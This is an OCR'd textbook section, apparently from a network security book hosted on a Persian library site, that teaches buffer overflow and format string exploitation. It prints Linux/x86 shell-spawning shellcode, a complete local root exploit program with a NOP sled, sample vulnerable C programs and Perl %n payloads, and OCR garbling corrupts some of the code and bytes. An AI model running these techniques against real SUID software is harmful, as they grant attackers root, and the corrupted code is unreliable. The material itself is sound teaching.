Building.Open.Source.Network.Security.Tools.Components.And.Techniques [Electronic resources] نسخه متنی

Vulnerability Testing

Vulnerability testing is the process of exploiting a system's susceptibility to vulnerability. Sometimes considered the technique of malcontents, vulnerability testing is widely used by security professionals for proof-of-concept testing or during consulting engagements or directed research. In the wrong hands, however, vulnerability testing (often simply called exploiting) can be a powerful and dangerous technique. Consider a serious security flaw that exists in software that you widely deploy across the Internet. Couple that with a tool that exploits this flaw to yield privileged access, and the potential for shenanigans is high.

Tools employing this technique (exploits) generally tend to be small and specifically tailored toward a specific vulnerability or a class of vulnerabilities. Often, developers write them to target one particular vulnerability on a particular architecture (such is the case with buffer overflow and format string-related exploits). While we do not mean for this section to be a cookbook for how to write exploit code, we describe two common methods of exploitation—traditional buffer overflows and format string attacks.

The Programmer's Stack

Both of the vulnerability testing methods covered intimately deal with the stack—and as such, we describe it briefly as follows.

A stack is an abstract data type that most every modern computer system employs. Also known as a last in, first out (LIFO) queue, the stack is a central component in today's high-level programming languages (such as C). Arguably the most important technique for building programs with high-level languages is the function call. When a function call occurs, the flow of control of a program alters as it moves to the function's address to execute the function's code, and then control returns to the original location immediately after the function call. You accomplish this task with the use of a stack. The stack also dynamically allocates the local variables used in functions, passes parameters to the functions, and returns values from the function to the caller. For example, the return address and arguments to a function are pushed down onto the stack before calling the function and then popped back off the stack when returning from it in order to restore the program's state. We will see how certain programming flaws enable attackers to manipulate values on the stack to cause exceptional events to occur.

Architectural Specificity

As most application programmers know, the x86 stack grows downward from high memory addresses to low memory addresses. Not so well known, however, is the fact that some operating systems provide functionality to pad the stackframe for each new process with a random number of bytes. The following code snippet shows OpenBSD's algorithm for performing this task on little-endian machines:


stackgap_random = 1024;
sgap = 512;
sgap += (arc4random() * (sizeof(int) - 1)) & (stackgap_random - 1);

Because buffer overflow and format string exploits rely on knowing the stack pointer address, this randomization process frustrates attack and penetration-based tools that utilize these methods. As such, except where noted, the following examples are built and compiled on an OpenBSD kernel with random stackgap padding disabled.

Buffer Overflow Vulnerabilities

Considered to be the hallmark of poor programming, a program susceptible to a buffer overflow enables the attacker to control the flow of afflicted software and often to completely shore up control of the program. A buffer overflow, simply put, is the act of filling up a contiguous buffer past its predefined boundaries. Consider the following sample program (which we assume to be built and installed on the SUID root):


#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int
main(int argc, char **argv)
{
char buf[512];
setuid(O);
seteuid(O);
/* not vulnerable to a buffer overflow attack */
stmcpy buf, argvfl], 512);
printf("Completed strncpy().\n");
/* vulnerable to a buffer overflow attack */
strcpy(buf, argv[l]);
printf("Completed strcpy().\n");
return (0);
}

This code shows both the right way and the wrong way to handle strings. To the untrained eye, it appears that the code is completely functional and that the two blocks of code are equivalent, but the programmer made a fatal flaw in the second set of statements. When the program is compiled and executes, under normal circumstances both pairs of statements execute correctly:


tradecraft:~>./overflowl "sup dorks"
Completed strncpy().
Completed strcpy().

As expected, the process flow of both segments is identical. If argv [1] is much larger than 512 bytes, however, the program does not behave as expected. Consider the following invocation:


tradecraft: ~> ./overflowl 'peri -e 'print "X"x1000' '
Completed strncpy().
Segmentation fault (core dumped)

The first statement completed successfully while the second one seemed to cause a memory segmentation fault. To understand why, and to know why this situation can be a security liability, we need to understand a little bit more about our programming language and environment.

Why C Makes Buffer Overflows Possible

The C programming language, by modern programming standards, is actually a rather low-level language. The function calls that the programmer utilizes often compile down into only a handful of mnemonic machine code instructions. One can argue that the main reason why C has remained so popular for three decades is the power and flexibility that such low-level behavior provides. For example, rather than creating a string variable type for the C language, the language designers and maintainers require the programmer to create an array of characters (which are a single byte each on most platforms) for use with text. It becomes the responsibility of the programmer to allocate, manage, and free the memory needed for a string.

If a programmer attempts to write a block of data that is larger than the target character array, as in our previous example, the compiled language itself does not cry foul. Instead, the code instructs the system to complete the operation and complete the data write. Several scenarios might occur after the function call. If only a small amount of data is written outside the allocated space, the program might continue as if no anomalous behavior occurred. If other variables occupy the neighboring space in the memory structure, known as the heap, it is possible that the newly written data will overwrite information in the neighboring space (referred to as a heap overflow; we do not cover this topic in depth here). In many cases, the program halts with a segmentation fault (as seen earlier) or a signal from the operating system that the process is attempting to access memory that it has not allocated.

We devote this section to the outcome of the final scenario. If enough data is written to the buffer, the resulting overflow can infringe upon the memory space utilized by the processor for program flow and local variable storage (also known as the stack). If any of the information in the stack is corrupted, such as the processor's pointer to the current instruction being executed, it is almost certain that the program would terminate in a crash.

Creative individuals, however, have found a way to exploit this shortcoming in the handling of strings. It is possible to overflow a buffer in such a way as to insert a new value for the instruction pointer utilized by the processor upon return from the current function being executed. A clever system attacker could fool the processor into thinking that data introduced by the attacker into heap memory space is legitimate, executable code. In many cases, because the program runs with the same user permissions as the user who is calling the process, this program is of little use to an attacker. When the process is run as root to enable access to the privileged ports—or the program is accessible to local users and is set to run as root—regardless of thp user executing the process, the security of the system can be compromised. Because the code being executed out of the heap space is run with the same permissions as the process itself, a malicious user can therefore have a root process execute arbitrary code. This situation is obviously bad.

A Sample Overflow

Next, we have a sample buffer overflow program that is capable of breaking the overflow! program that we presented earher:


#include <stdio.h>
#include <string.h>
#include <stdlib.h>

The following function places the address of the current stack pointer in a register that it used for returning the results of function calls. When the get_esp() call returns, this value also returns to the calling function:


/* find out where we are in the current memory space */
unsigned long get_esp(void) {
_asm_("movl %esp,%eax");
}

The following sequence of assembly instructions lies at the heart of the buffer overflow attack. The chain of machine codes instructs the processor to place the system call number in the first register, a pointer to the address of the string "/bin/sh" in the second register, the address to the string "/bin/sh" in the third register, and NULL in the fourth register. Next, the processor is interrupted to execute the program. Upon return, the malicious code graciously informs the processor that the instruction set completed successfully:


/* Our shellcode:
* Assembly language for "launch a shell" and "exit cleanly".
* This includes code to produce NULLs through XORs and switch to
* relative addressing using an unreturned CALL.
* This shellcode is written for Linux/x86.
*/
char shellcode[] =
"\xeb\xlf\x5e\x89\x76\x08\x31\xcO\x88\x46\x07\x89\x46\xOc\xbO\xOb"
"\x89\xf3\x8d\x4e\x08\x8d\x56\xOc\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(int argc, char **argv)
{
char *egg;
long retaddr;
int eggsize, offset, i;
/* Provide some basic help to the user */
if (argc != 3)
{
printf("Usage: /n");
printf(" tbreak [eggsize] [offset] /n");
printf(" tvulnprog $EGG /n");
return (EXIT_FAILURE);
}
/* convert values passed to us by the user to integers */
eggsize = atoi(argv[l]);
offset = atoi(argv[2]);

Here, memory is allocated to build the attack code, which we often refer to as an "egg":



if ((egg = (char *)malloc(eggsize)) == NULL)
{
perror("malice");
return (EXIT_FAILURE);
}

A call to get_esp() grabs the current location of the stack in memory and also enables the user to subtract an arbitrary offset from this value. Careful adjustment of this offset often means the difference between a functional and non-functional overflow attack:


/* get return address */
retaddr = get_esp() - offset;

In order to increase the chances of successfully inserting the arbitrary return address into the correct position on the stack (and therefore successfully exploiting the overflow), the entire egg fills with the target address:


/* fill the entire array with the targeted return address. */
for (i = 0; i < (eggsize / 4); i++)
{
*((long *)egg + i) = retaddr;
}

The return addresses, which were placed in the first half of the egg earlier, are now replaced with dummy instructions. These "No Operation" (or NOPs for short) form a "landing pad" for the return address. If the return address ends up landing anywhere in the middle of the field of NOPs, the processor processes these nominally and increments until it hits the shell code segment (which has yet to be inserted):


/* setup NOP ramp */
for (i = 0; i eggsize / 2; i++)
(
*(egg + i) = 0x90;
}

The program then copies the shell code created earlier into the middle of the egg, placing it directly between the NOPs and the return address segment. It caps it off with a NULL terminator (remember that this shell code needs to be treated as a string):


/* put our target shell code right smack in the middle */
for (i =0; i strlen(shellcode); i++)
{
*(egg + i + (eggsize/2) - (strlen(shellcode) / 2}) = shellcodefi];
}
/* cap the end of the array with a NULL */
egg[eggsize-l] = '\0';
/* drop the whole thing into an environmental variable */
memcpy(egg, "EGG=", 4);
putenv(egg);
/* perform a sanity check of what was built */
printf("Eggsize/Offset: %i/%i /n", eggsize, offset);
printf("Retaddr: Ox%x\n", retaddr);
printf("Egg: ");
for (i = 0; i < eggsize; i++)
{
printf("%x", egg[i]);
}
printf("\n");
/* spawn a shell, and away we go! */
system("/bin/bash");

The egg is now in place in the environment of the newly spawned shell. All that is required now is to execute the vulnerable program with the environmental variable $EGG as an argument:


return (EXIT_SUCCESS);
}

It is up to the user to determine the correct egg size. In general, the egg has to be large enough to fully overwrite the target buffer and intrude into the stack far enough to replace the old instruction pointer with the new return address. Because the size of our target buffer is already known (512 bytes), it is a fair guess that the egg should be at least 600 bytes deep. Again, due to the numerous copies of the return address that exist in the tail of the egg, the user has quite a bit of leeway in defining the egg size.

The offset provides the user with another degree of freedom in the overflow attempt by enabling precise control of the return address. It might be the case that the NOP ramp does not begin at the return address extracted from the current stack pointer. By providing an offset address on the command line, the user can bump down the return address, safely placing it in the range of the NOP ramp at the beginning of the egg.

In the following section, you can find a sample invocation of the software. We omitted a complete dump of the shell code for the sake of brevity.


tradecraft: ~# ./break 600 0
Eggsize/Offset: 600/0
Retaddr: Oxbffffl28
tradecraft: ~# ./overflowl $EGG
Completed strncpy().
Completed strcpy().
Segmentation fault (core dumped)

Here, we see an unsuccessful attempt at overflowing the buffer and changing the old instruction pointer to our target return address. Another attempt at increasing our egg size by 100 bytes is as follows:


tradecraft: ~>./break 700 0
Eggsize/Offset: 700/0
Retaddr: Oxbffff888
tradecraft: ~>./overflowl $EGG
Completed strncpy().
Completed strcpy().
sh-2.04# id
uid=0(root) gid=1001(route) groups=1001(route)

The creation of an instance of /bin/sh indicates that the exploit of the overflow condition was successful. Because the overflowl binary was configured to run with root privileges, the user executing the overflow has complete control over the system.

Over the past decade, the security community has weathered hundreds of vulnerabilities in major operational system components due to buffer overflow issues. Because the discovery and attack process of these programming errors has practically become algorithmic for most exploit writers, buffer overflow-style attacks are one of the chief system security concerns. Unlike DoS-style attacks, such as SYN floods and rapid virus propagation, the existence of buffer overflow attacks is largely unreported by the media and continues to crop up (even in modern code implementations).

Format String Vulnerabilities

Format string vulnerabilities, like buffer overflows, are programming flaws that enable the attacker to potentially control the afflicted software. Also, like buffer overflows, format string vulnerabilities tend to crop up whenever arbitrary user input is allowed into a program. Any program that (improperly) handles input from an external source can be vulnerable to these attacks. Consider the following short program:


#include <stdio.h>
int
main(int argc, char **argv)
{
/* not vulnerable to a forrat string attack */
printf("%s", argv[l]);
printf(" /n");
/* vulnerable to a format string attacK */
printf(argv[l]);
printf(" /n");
return (0);
}

To the casual programmer, the first and last printf() statements appear similar. Sure, the programmer took a shortcut in the second statement—and, rather than specifying a format string as in the first function call, he passed the string to be printed directly to the function. Indeed, both statements accomplish the same thing—right? The answer is yes and no. When the program is compiled and executed, under normal circumstances both statements will do the same thing:


tradecraft: ~# ./fmtl "handsome devil"
handsome devil
handsome devil

As expected, the output from both statements is identical, printf(), however, has considerably more functionality built into it than simple screen output. Consider the following invocation:


tradecraft: ~# ./fmtl "%x %x %x %x"
%x %x %x %x
dfbfd668 dfbfd5b4 17ab 0

This result is obviously not expected. The first statement displayed the string as entered at the command line while the second statement output something entirely different. To understand what is going on and to understand why it is a security flaw, we first need to understand format strings.

What Is a Format String?

A format string is a programming primitive employed with the printf() family of functions and is used to dictate the formatting of an arbitrary character string. Examples of format specifiers appear in Table 10.1.

Table 10.1: Format Specifiers
FORMAT	MEANING

`%d`	Interprets the argument specified as a signed decimal number

`%x`	Interprets the argument specified as an unsigned hexadecimal number

`%s`	Interprets the argument specified as a string

`%p`	Interprets the argument specified as an address (pointer)

`%n`	Stores the number of characters that should be outputted before the format specifier in the argument

Another short program containing a typical format string is as follows:


#include <stdio.h>
int
main(int argc, char **argv)
{
int n, m;
n = 10;
printf("The variable n is %d and lives at %p.%n /n", n, &n, &m);
printf("The above line is %d characters.\n", m);
return (0);
}

This program, when executed, produces the following output:


tradecraft: ~# ./fmt2
The variable n is 10 and lives at Oxdfbfdl9O.
The above line is 45 characters.

As format specifiers are encountered within a format string, a variable number of arguments are retrieved from the stack and processed accordingly. In this example, the printf() function scans the format string and first encounters the %d format specifier. It pulls the first four bytes from the stack, which happens to be the value n, and formats them as an integer, printf() then reads the next format specifier %p and pulls the next four bytes from the stack, the address of n, and formats them as a pointer. Finally, the first printf() statement reads the %n format specifier and writes the number of bytes output to the address specified by the next four bytes on the stack, which point to the variable m. The second printf() statement prints out the number of characters outputted by the first statement.

By printing out these values stored on the stack, an attacker can peek into the memory of the program. Also possible, as we will see, is the ability to write arbitrary values to the stack.

A Sample Format String Attack

To illustrate and frame these points better, we consider the next program that contains a format string vulnerability:


#include <stdio.h>
int
main(int argc, char **argv)
{
char buf[100]; int n;
n = 1;
/* read input from command line and NULL terminate */
snprintf (buf, sizeof (buf), argv[l]);
buf[sizeof (buf) - 1] = 0;
printf("\n%d byte buffer: %s\n", strlen(buf), buf);
printf("The variable n is %d and lives at %p.\n", n, &n);
return (0);
}

We invoke this program with a simple string:


tradecraft: ~# ./fmt3 "hello world"
11 byte buffer: hello world
The variable n is 1 and lives at Oxdfbfd220.

Nothing is out of the ordinary about this invocation. The string was formatted and output, as was the local variable n. When we invoke the program with a string consisting of four format specifiers, however, as in the first example, the story is a bit more compelling:


tradecraft: ~# ./fmt3 "%x %x %x %x %x"
29 byte buffer: 17eb dfbfdb40 40002064 2074 1
The variable n is 1 and lives at Oxdfbfdb20.

The five values that are output are the next five arguments on the stack immediately following the format string "%x %x %x %x %x": the local variable n and 16 bytes of data formatted as four 4-byte integers taken from the buf variable. This situation happens because snprintf() interprets the argument passed in by the user as a format string. snprintf() then expects that immediately following the format string in memory, there will be four integers to format as hexadecimal values into this string. Because these values are not supplied, it pulls the next 20 bytes from the stack, which happen to be variable n, and 16 bytes from buf. This situation is what happened in the first example, too.

The penultimate moment of this attack comes into play with the realization that the arbitrary values entered at the command line that are stored in the buffer can end up also being used as arguments to snprintf(). Consider the following invocation:


tradecraft: ~# ./fmt3 "XXXX %x %x %x %x %x %x %x"
45 byte buffer: XXXX 17eb dfbfd108 40002064 2074 1 1 58585858
The variable nisi and lives at OxdfbfdOe8.

Here, we see that the four X characters supplied at the command line were copied to the beginning of buf and interpreted by snprintf() as a hexadecimal argument (an X is 0x58 when encoded in ASCII).

Finally, we use this information to modify values stored in our program. Consider the following example, which uses Perl to judiciously place a hexadecimal address in the format string:


tradecraft: ~# peri -e 'system "./fmt3",
"\xlc\xdb\xbf\xdf%x%x%x%x%x%d%n" '
30 byte buffer: - ??17ebdfbfdb3c40002064207411
The variable n is 30 and lives at Oxdfbfdblc.

By specifying this format string in the program, we changed the value of n. In effect, the function call to snprintf() looks something like the following:


snprintf(buf, sizeof (buf),
"\xlc\xdb\xbf\xdf%x%x%x%x%x%d%n",
<20 bytes of data from the stack>,
n,
Oxdfbfdblc);

First, snprintf() copies the initial 4 bytes of the format string into buf. Next, it scans the five %x format specifiers and pulls 20 bytes from the stack and copies them, as integers, into buf. Next, snprintf() formats and prints the value of n into buf. Finally, snprintf() reaches the %n specifier (which tells it to read the next 4 bytes as an address and write the number of characters output thus far as an integer to this address, which just so happens to point to n). It is no accident that printf() will write this value to n; we specified n's address at the beginning of our format string.

The output from the printf() statement looks garbled because we formatted unprintable characters into our buffer.

In order to change the value of n to other values, we can pad the format string as such:


tradecraft: ~# peri -e 'system "./fmt-3",
"\xlc\xdb\xbf\xdf%x%x%x%x%x %d%n" '
32 byte buffer: - ?17ebdfbfdb3c4000206420741       1
The variable n is 32 and lives at 0xdfbfdblc.

But in order to write values to n that are larger than the upper limit of buf (it is constrained to holding 100 characters), we employ the format width specifier:


tradecraft: ~# perl -e 'system "./fmt3",
"\xlc\xdb\xbf\xdf%x%x%x%x%x%.99d%n" '
99 byte buffer: ?&Auml; ?17ebdfbfdb3c4000206420741000000000000000000000000000
0000000000000000000000000000000000000000000
The variable n is 129 and lives at 0xdfbfdblc.

Recall that %n prints the number of characters that should be outputted. Although buf was only capable of outputting 100 characters, the %n format specifier still records 129.

To write the value 0 to n, we shift the address that we are writing to 3 bytes:


tradecraft: ~# peri -e 'system "./fmt3",
"\xl9\xdb\xbf\xdf%x%x%x%x%x%d%n" '
30 byte buffer: -- ?17ebdfbfdb3c40002064207411
The variable n is 0 and lives at 0xdfbfdblc.

This process works because the value written to n, 30, is represented as a 4-byte little-endian integer: 0xld 0x00 0x00 0x00. We end up performing an unaligned write (which fails on processors that have stricter alignment restrictions, such as SPARC) that overwrites the low-order portion of the variable n. A side effect of this write is that we also overwrite 1 byte adjacent to n with 0xld, which might or might not cause complications.

The security implications of format string attacks come into play when they are extended to overwrite a stored UID variable that will be restored or to overwrite a function's return address to return to a buffer containing user-defined shell code.

Format string vulnerabilities are still relatively new to the security scene. While they have existed since code was first penned, only recently have they been discovered and brought to light. Since then, the floodgates have opened and all sorts of programs have been found vulnerable. Like buffer overflows, the solution to the problem here is education. Once programmers stop making coding mistakes, the vulnerabilities go away.

Building.Open.Source.Network.Security.Tools.Components.And.Techniques [Electronic resources] نسخه متنی

فارسی

کردی

العربیه

اردو

Türkçe

Русский

English

Français

کانال فیلم من

تبیان من

فایلهای من

کتابخانه من

پنل پیامکی

وبلاگ من

اینجــــا یک کتابخانه دیجیتالی است

با بیش از 100000 منبع الکترونیکی رایگان به زبان فارسی ، عربی و انگلیسی